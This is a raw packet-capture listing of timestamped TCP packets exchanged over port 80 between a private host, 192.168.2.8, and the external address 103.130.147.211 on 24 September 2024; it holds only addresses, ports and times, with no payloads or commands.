                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400345087 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400353909 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400361061 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400376081 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400378942 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400391102 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400403976 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400412083 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400412083 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400418997 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400434017 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400434971 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400448084 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400463104 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400477886 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.400520086 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401129007 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401144981 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401158094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401171923 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401186943 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401191950 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401201963 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401216030 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401225090 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401230097 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401252985 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401268005 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401272058 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401281118 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401294947 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401295900 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401309967 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401324987 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401328087 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401339054 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401354074 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401365995 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401367903 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401382923 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401387930 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401412964 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.401442051 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402220964 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402236938 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402250051 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402265072 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402272940 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402277946 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402292967 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402307987 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402318001 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402323008 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402337074 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402338028 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402353048 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402367115 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402374983 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402386904 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402401924 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402410984 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402415991 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402431011 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402434111 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402445078 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402460098 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402472973 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402484894 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402502060 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.402518988 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403206110 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403222084 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403234959 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403249979 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403260946 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403264046 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403280973 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403295040 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403299093 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403307915 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403316021 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403321981 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403328896 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403328896 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403337002 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403359890 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403373957 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403377056 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403395891 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403417110 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.403438091 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404005051 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404020071 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404033899 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404048920 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404058933 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404062986 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404078007 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404088020 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404092073 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404105902 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404120922 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404120922 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404144049 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404145002 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404158115 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404167891 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404174089 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404187918 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404198885 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404202938 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404217958 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404241085 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404258966 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404264927 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404268980 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404273033 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404293060 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.404331923 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405002117 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405018091 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405034065 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405049086 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405061960 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405062914 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405077934 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405081987 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405117035 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405126095 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405133009 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405147076 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405160904 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405167103 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405174971 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405189991 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405203104 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405206919 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405216932 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405230999 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405245066 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405246973 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405258894 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405272007 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405272961 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405292988 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.405316114 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406101942 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406116962 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406131983 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406146049 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406152964 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406160116 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406174898 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406176090 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406189919 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406204939 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406209946 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406219959 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406234026 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406234980 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406250000 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406263113 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406264067 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406276941 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406291962 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406301975 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406307936 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406322956 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406325102 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406352997 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406379938 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406467915 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406508923 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406802893 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406817913 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406831980 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406852961 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406852961 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406867027 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406872988 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406881094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406893969 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406908035 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406908989 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406922102 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406929970 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406936884 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406950951 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406950951 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406965017 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406980038 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406987906 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.406995058 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407008886 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407020092 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407023907 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407037973 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407042027 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407052040 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407066107 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407084942 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407114029 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407804966 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407820940 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407834053 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407847881 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407851934 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407861948 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407876015 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407888889 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407898903 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407903910 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407917976 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407932043 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407934904 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407946110 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407958031 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407960892 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407975912 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407979012 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.407989979 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408004045 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408018112 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408018112 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408031940 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408049107 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408056974 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408061981 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408078909 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408108950 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408715010 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408730984 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408745050 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408760071 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408766031 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408775091 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408788919 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408803940 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408813000 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408828020 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408840895 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408843040 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408858061 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408864021 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408871889 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408885956 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408909082 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408916950 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.408956051 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409349918 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409365892 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409388065 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409401894 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409403086 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409415960 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409430981 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409441948 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409444094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409451962 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409459114 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409466028 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409476995 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409480095 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409493923 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409507990 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409513950 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409523010 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409537077 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409549952 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409574032 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409789085 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.409804106 CEST8049734103.130.147.211192.168.2.8
